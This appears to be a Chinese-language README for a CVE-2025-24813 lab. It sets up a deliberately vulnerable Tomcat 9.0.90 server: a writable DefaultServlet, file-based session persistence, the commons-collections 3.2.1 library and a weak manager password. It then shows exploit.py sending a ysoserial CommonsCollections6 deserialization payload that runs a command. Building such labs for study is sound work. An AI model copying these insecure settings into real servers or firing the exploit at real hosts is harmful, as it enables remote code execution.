
在 Windows Server 2019 Standard 上,为懒人研究员快速部署 Tomcat v9.0.90 与 java 25.0.1 2025-10-21 LTS 的说明。
本仓库旨在提供清晰的说明,用于在 Windows Server 2019 Standard 上快速部署 Tomcat v9.0.90 和 java 25.0.1 2025-10-21 LTS,以进行网络安全威胁模拟演练。exploit.py 利用 ysoserial-all.jar 中的 CommonsCollections6 模块生成有效载荷,该载荷随后被 %CATALINA_HOME%\webapps\ROOT\WEB-INF\lib 中的 commons-collections-3.2.1.jar 依赖项反序列化。
Tomcat v9.0.90:Invoke-WebRequest -Uri "https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.90/bin/apache-tomcat-9.0.90-windows-x64.zip" -OutFile "apache-tomcat-9.0.90-windows-x64.zip"
Expand-Archive -Path "apache-tomcat-9.0.90-windows-x64.zip" -DestinationPath "C:\"
java 25.0.1 2025-10-21 LTS(ZIP 版本):Invoke-WebRequest -Uri "https://download.oracle.com/java/25/archive/jdk-25_windows-x64_bin.zip" -OutFile "jdk-25_windows-x64_bin.zip"
Expand-Archive -Path "jdk-25_windows-x64_bin.zip" -DestinationPath "C:\"
mkdir C:\apache-tomcat-9.0.90\webapps\ROOT\WEB-INF\lib\
cd C:\apache-tomcat-9.0.90\webapps\ROOT\WEB-INF\lib\
Invoke-WebRequest -Uri "https://repo1.maven.org/maven2/commons-collections/commons-collections/3.2.1/commons-collections-3.2.1.jar" -OutFile "commons-collections-3.2.1.jar"
1. 点击“开始”
2. 输入“编辑系统环境变量”
3. 创建两个新的系统变量,命名为:
- `%JAVA_HOME%`,值为 `C:\jdk-25.0.1`
- `%CATALINA_HOME%`,值为 `C:\apache-tomcat-9.0.90`
4. 编辑名为 `Path` 的系统变量,并添加以下值:
- `%JAVA_HOME%\bin`
- `%CATALINA_HOME%\bin`
C:\apache-tomcat-9.0.90\bin\service.bat install Tomcat9Server
Set-Service -Name "Tomcat9Server" -StartupType Automatic
Start-Service -Name "Tomcat9Server"
tomcat-9.0.90\conf 文件夹中的 tomcat-users.xml,并在 </tomcat-users> 之前添加以下内容:<role rolename="manager-gui"/>
<user username="tomcat" password="s3cret" roles="manager-gui"/>
<role rolename="manager-gui"/>
<user username="tomcat" password="s3cret" roles="manager-gui"/>
tomcat-9.0.90\conf 文件夹中的 context.xml,并将所有内容替换为以下内容:<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<!-- The contents of this file will be loaded for each web application -->
<Context>
<Manager className="org.apache.catalina.session.PersistentManager" maxIdleBackup="1" saveOnRestart="true" processExpiresFrequency="1">
<Store className="org.apache.catalina.session.FileStore"/>
</Manager>
</Context>
tomcat-9.0.90\conf 文件夹中的 web.xml,搜索 DefaultServlet,并将整个 <servlet></servlet> 替换为以下内容:<servlet>
<servlet-name>default</servlet-name>
<servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
<init-param>
<param-name>debug</param-name>
<param-value>0</param-value>
</init-param>
<init-param>
<param-name>listings</param-name>
<param-value>false</param-value>
</init-param>
<init-param>
<param-name>readonly</param-name>
<param-value>false</param-value>
</init-param>
<load-on-startup>1</load-on-startup>
</servlet>
shutdown.bat
startup.bat
New-NetFirewallRule -DisplayName "Tomcat9Server" -Direction Inbound -Protocol TCP -LocalPort 8080 -Action Allow
C:\tomcat-9.0.90\webapps\ROOT 中添加一些看起来合法的 index.html,使其看起来更专业。<Connector port="443"
protocol="org.apache.coyote.http11.Http11NioProtocol"
maxThreads="150"
SSLEnabled="true"
scheme="https"
secure="true">
<SSLHostConfig>
<Certificate certificateKeystoreFile="C:\tomcat-9.0.90\conf\ssl\cert.pfx"
certificateKeystorePassword=""
certificateKeystoreType="PKCS12" />
</SSLHostConfig>
</Connector>
New-NetFirewallRule -DisplayName "Tomcat9HTTPSServer" -Direction Inbound -Protocol TCP -LocalPort 443 -Action Allow
exploit.pygit clone <this-repo-url>
cd CVE-2025-24813
pip install requests
java --version
curl -L -o ysoserial-all.jar https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar
python exploit.py -t http://<target IP>:8080/ -c "cmd.exe /c calc.exe"
exploit.py 时,会在 C:\tomcat-9.0.90\webapps\ROOT 和 C:\tomcat-9.0.90\work\Catalina\localhost\ROOT 中创建两个具有随机名称的会话文件。工作文件夹中的 .session 文件应在执行后几秒钟内被删除。